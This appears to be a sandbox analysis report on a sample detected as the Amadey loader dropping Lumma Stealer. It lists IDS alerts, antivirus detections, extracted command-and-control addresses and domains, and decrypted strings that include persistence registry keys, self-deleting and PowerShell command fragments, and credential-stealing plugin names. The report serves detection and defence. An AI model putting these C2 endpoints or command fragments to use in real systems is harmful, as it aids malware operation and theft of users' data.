2025-01-07T10:09:39.758178+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50059	185.215.113.43	80	TCP
2025-01-07T10:09:44.384007+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50065	185.215.113.43	80	TCP
2025-01-07T10:09:49.117216+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50072	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.604459+0100	2058598	1	Domain Observed Used for C2 Detected	192.168.2.4	50567	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.871263+0100	2058606	1	Domain Observed Used for C2 Detected	192.168.2.4	50810	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:42.095169+0100	2058638	1	Domain Observed Used for C2 Detected	192.168.2.4	53046	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.394525+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.4	54148	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.685756+0100	2058610	1	Domain Observed Used for C2 Detected	192.168.2.4	63128	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.522327+0100	2058616	1	Domain Observed Used for C2 Detected	192.168.2.4	53496	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.765493+0100	2058618	1	Domain Observed Used for C2 Detected	192.168.2.4	59280	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.824648+0100	2058622	1	Domain Observed Used for C2 Detected	192.168.2.4	49482	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.735053+0100	2058628	1	Domain Observed Used for C2 Detected	192.168.2.4	54319	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:23.212802+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.4	49948	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:16.638894+0100	2058632	1	Domain Observed Used for C2 Detected	192.168.2.4	59298	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:24.748313+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50035	104.21.96.1	443	TCP
2025-01-07T10:09:30.524968+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:45.477294+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50066	172.67.132.7	443	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:40.833631+0100	2800029	1	Attempted User Privilege Gain	31.41.244.11	80	192.168.2.4	50061	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:05.769785+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49793	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:07:10.626302+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50064	185.163.204.98	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:11.226172+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49809	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:08:08.806068+0100	2803305	3	Unknown Traffic	192.168.2.4	49816	185.215.113.16	80	TCP
2025-01-07T10:08:12.638883+0100	2803305	3	Unknown Traffic	192.168.2.4	49843	185.215.113.16	80	TCP
2025-01-07T10:08:59.745472+0100	2803305	3	Unknown Traffic	192.168.2.4	50017	31.41.244.11	80	TCP
2025-01-07T10:09:13.226931+0100	2803305	3	Unknown Traffic	192.168.2.4	50019	31.41.244.11	80	TCP
2025-01-07T10:09:17.774371+0100	2803305	3	Unknown Traffic	192.168.2.4	50022	31.41.244.11	80	TCP
2025-01-07T10:09:22.005591+0100	2803305	3	Unknown Traffic	192.168.2.4	50031	31.41.244.11	80	TCP
2025-01-07T10:09:26.463211+0100	2803305	3	Unknown Traffic	192.168.2.4	50040	31.41.244.11	80	TCP
2025-01-07T10:09:31.620224+0100	2803305	3	Unknown Traffic	192.168.2.4	50050	31.41.244.11	80	TCP
2025-01-07T10:09:35.783561+0100	2803305	3	Unknown Traffic	192.168.2.4	50056	31.41.244.11	80	TCP
2025-01-07T10:09:40.468346+0100	2803305	3	Unknown Traffic	192.168.2.4	50061	31.41.244.11	80	TCP
2025-01-07T10:09:45.105259+0100	2803305	3	Unknown Traffic	192.168.2.4	50067	31.41.244.11	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:18.129846+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	50021	104.102.49.254	443	TCP

ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T10:09:42.106576+0100	2856097	1	A Network Trojan was detected	192.168.2.4	50030	185.163.204.98	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1304598
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe	Avira: detection malicious, Label: HEUR/AGEN.1304598
Source: C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe	Avira: detection malicious, Label: HEUR/AGEN.1304598
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1304598

Found malware configuration

Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 9a8f788f0d.exe.6.dr	Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop", "framekgirus.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--hcxnojluavhd"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Dd7mHw1[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 61%			Perma Link
Source: file.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Phishing

Yara detected obfuscated html page

Source: Yara match	File source: C:\Temp\CucWPjLzJ.txt, type: DROPPED
Source: Yara match	File source: C:\Temp\random.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\.gif, type: DROPPED
Source: Yara match	File source: C:\Temp\erFIq31tw.txt, type: DROPPED
Source: Yara match	File source: C:\Temp\A9Dfw7SLp.txt, type: DROPPED
Source: Yara match	File source: C:\Temp\w9dhIoFqs.txt, type: DROPPED
Source: Yara match	File source: C:\Temp\WkYLwajB0.txt, type: DROPPED
Source: Yara match	File source: C:\Temp\CAvWBYtqI.txt, type: DROPPED

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: e.pdb source: powershell.exe, 0000003B.00000002.2795085782.000001ED7C520000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *n.pdb; source: powershell.exe, 0000003B.00000002.2790182880.000001ED7C1B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000020.00000002.2548719223.000001EC578A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2548719223.000001EC578A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Hpdbtem.pdb_ source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.Core.pdbN source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbpdbtem.pdb source: powershell.exe, 0000005B.00000002.3236652495.000002072F845000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ows\dll\mscorlib.pdbb source: powershell.exe, 0000003B.00000002.2790182880.000001ED7C1B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pdbpdblib.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000069.00000002.3174475979.0000020579ECE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000049.00000002.3142154835.000001DBA02AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *e.pdbU7MA source: powershell.exe, 0000005B.00000002.3246069714.000002072FA50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbDh source: powershell.exe, 00000069.00000002.3239794488.000002057A140000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.tmp	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49793 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49840 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49860 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49809
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50016 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50018 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.4:53496 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.4:59298 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.4:50567 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.4:50810 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.4:59280 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.4:63128 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.4:54319 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:54148 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50020 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.4:49482 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50029 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:49948 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50034 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50039 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50037 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50041 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50044 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50045 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50048 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50051 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50055 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2048736 - Severity 1 - ET MALWARE LUMAR Stealer Exfiltration M2 : 192.168.2.4:50057 -> 185.244.212.106:2227
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:50058 -> 188.114.97.3:443
